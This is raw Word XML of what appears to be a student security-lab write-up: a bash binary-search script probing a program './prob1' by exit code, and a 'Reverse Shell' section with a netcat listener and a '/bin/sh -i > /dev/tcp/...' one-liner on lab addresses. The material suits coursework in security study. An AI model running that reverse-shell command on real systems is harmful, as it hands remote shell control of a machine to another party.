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8138D" w14:textId="021CB7E5" w:rsidR="00BF37DF" w:rsidRDefault="00BF37DF">
      <w:r w:rsidRPr="00BF37DF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Shell scripting:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466AB4CB" w14:textId="77777777" w:rsidR="00BF37DF" w:rsidRDefault="00BF37DF" w:rsidP="00BF37DF">
      <w:r>
        <w:t>TARGET=$1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A6A2FF" w14:textId="07B8955B" w:rsidR="00BF37DF" w:rsidRDefault="00BF37DF" w:rsidP="00BF37DF">
      <w:r>
        <w:t xml:space="preserve">    TO_SEARCH=(${</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>@:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>2})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26990B45" w14:textId="4BF56F81" w:rsidR="00BF37DF" w:rsidRDefault="00BF37DF" w:rsidP="00BF37DF">
      <w:r>
        <w:t xml:space="preserve">    LENGTH=${#TO_SEARCH[@]}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585229AF" w14:textId="77777777" w:rsidR="00BF37DF" w:rsidRDefault="00BF37DF" w:rsidP="00BF37DF">
      <w:r>
        <w:t xml:space="preserve">    START=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631613AF" w14:textId="543D7EBE" w:rsidR="00BF37DF" w:rsidRDefault="00BF37DF" w:rsidP="00BF37DF">
      <w:r>
        <w:t xml:space="preserve">    END=2147483647</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FE1D1A" w14:textId="644D6919" w:rsidR="00BF37DF" w:rsidRDefault="00BF37DF" w:rsidP="00BF37DF">
      <w:r>
        <w:t xml:space="preserve">    while [[ $START -le $END ]]; do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FAF6A4E" w14:textId="2BB909F9" w:rsidR="00BF37DF" w:rsidRDefault="00BF37DF" w:rsidP="00BF37DF">
      <w:r>
        <w:t xml:space="preserve">        MIDDLE=$(( (END + START) /2 ))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578DEF7A" w14:textId="04E4C616" w:rsidR="00BF37DF" w:rsidRDefault="00BF37DF" w:rsidP="00BF37DF">
      <w:r>
        <w:t xml:space="preserve">        ./prob1 $MIDDLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E93E914" w14:textId="1DDD7248" w:rsidR="00BF37DF" w:rsidRDefault="00BF37DF" w:rsidP="00BF37DF">
      <w:r>
        <w:t xml:space="preserve">        a=$?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B61A2F8" w14:textId="3940ED91" w:rsidR="00BF37DF" w:rsidRDefault="00BF37DF" w:rsidP="00BF37DF">
      <w:r>
        <w:t xml:space="preserve">        if [[  $a -eq 1 ]]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF5E126" w14:textId="3C2AD2B7" w:rsidR="00BF37DF" w:rsidRDefault="00BF37DF" w:rsidP="00BF37DF">
      <w:r>
        <w:t xml:space="preserve">            END=$((MIDDLE-1))        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CB57C8" w14:textId="6C2CA5DA" w:rsidR="00BF37DF" w:rsidRDefault="00BF37DF" w:rsidP="00BF37DF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elif</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> [[ $a -eq 2 ]]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBFD536" w14:textId="44D7DBB5" w:rsidR="00BF37DF" w:rsidRDefault="00BF37DF" w:rsidP="00BF37DF">
      <w:r>
        <w:t xml:space="preserve">            START=$((MIDDLE+1))   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796341AB" w14:textId="5D82162C" w:rsidR="00BF37DF" w:rsidRDefault="00BF37DF" w:rsidP="00BF37DF">
      <w:r>
        <w:t xml:space="preserve">        else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDB4124" w14:textId="492C89D4" w:rsidR="00BF37DF" w:rsidRDefault="00BF37DF" w:rsidP="00BF37DF">
      <w:r>
        <w:t xml:space="preserve">            echo $MIDDLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495F0461" w14:textId="57AB7EED" w:rsidR="00BF37DF" w:rsidRDefault="00BF37DF" w:rsidP="00BF37DF">
      <w:r>
        <w:t xml:space="preserve">            break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D37D248" w14:textId="6EC7817E" w:rsidR="00BF37DF" w:rsidRDefault="00BF37DF" w:rsidP="00BF37DF">
      <w:r>
        <w:t xml:space="preserve">        fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D16DBD7" w14:textId="74C07224" w:rsidR="00BF37DF" w:rsidRDefault="000A0D06" w:rsidP="00BF37DF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3E6ABE99" wp14:editId="45AC2DBF">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2591435</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>13335</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4739640" cy="266700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7DF">
        <w:t xml:space="preserve">    done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466F75D0" w14:textId="0BB785AD" w:rsidR="00BF37DF" w:rsidRDefault="00BF37DF"/>
    <w:p w14:paraId="2DE54860" w14:textId="58CDE40C" w:rsidR="00BF37DF" w:rsidRDefault="00BF37DF"/>
    <w:p w14:paraId="41D1E4F3" w14:textId="7428467D" w:rsidR="000A0D06" w:rsidRDefault="000A0D06"/>
    <w:p w14:paraId="482517B4" w14:textId="520B3C9D" w:rsidR="000A0D06" w:rsidRDefault="000A0D06"/>
    <w:p w14:paraId="14214647" w14:textId="5B91D334" w:rsidR="000A0D06" w:rsidRDefault="000A0D06"/>
    <w:p w14:paraId="046061B0" w14:textId="009050B8" w:rsidR="000A0D06" w:rsidRDefault="000A0D06"/>
    <w:p w14:paraId="3B7543AA" w14:textId="1CB199AB" w:rsidR="000A0D06" w:rsidRDefault="000A0D06"/>
    <w:p w14:paraId="79BE9408" w14:textId="1F41F251" w:rsidR="000A0D06" w:rsidRDefault="000A0D06"/>
    <w:p w14:paraId="3FF9C732" w14:textId="77777777" w:rsidR="000A0D06" w:rsidRDefault="000A0D06"/>
    <w:p w14:paraId="0B1529BD" w14:textId="7486A7F8" w:rsidR="000A0D06" w:rsidRPr="000A0D06" w:rsidRDefault="000A0D06">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A0D06">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Reverse Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2427CE84" w14:textId="4CDE2EDB" w:rsidR="000A0D06" w:rsidRDefault="000A0D06" w:rsidP="000A0D06">
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ifconfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09505B07" w14:textId="09CE8B14" w:rsidR="000A0D06" w:rsidRDefault="000A0D06" w:rsidP="000A0D06">
      <w:r>
        <w:t xml:space="preserve">  (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>finding</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> IP 10.9.0.5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F49F0E" w14:textId="3B83C05A" w:rsidR="000A0D06" w:rsidRDefault="000A0D06" w:rsidP="000A0D06">
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  $ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -l 9090</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10647FA5" w14:textId="15E7C35F" w:rsidR="00BF37DF" w:rsidRDefault="000A0D06">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="000A0D06">
        <w:t>/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000A0D06">
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000A0D06">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000A0D06">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000A0D06">
        <w:t xml:space="preserve"> &gt; /dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000A0D06">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000A0D06">
        <w:t>/10.9.0.1/9090 &lt;&amp;1 2&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773EC363" w14:textId="77777777" w:rsidR="000A0D06" w:rsidRDefault="000A0D06"/>
    <w:p w14:paraId="5C8122EB" w14:textId="4BB23A59" w:rsidR="00BF37DF" w:rsidRDefault="00BF37DF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C4B76D4" wp14:editId="2652A5E0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3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DF"/>
    <w:rsid w:val="000A0D06"/>
    <w:rsid w:val="002A2A86"/>
    <w:rsid w:val="00B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66A5"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{4FDC635C-A0E1-4018-B849-B607B894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7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lashita manduru</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>lashita manduru</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-01-27T01:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-01-27T01:26:00Z</dcterms:modified>
</cp:coreProperties>
</file>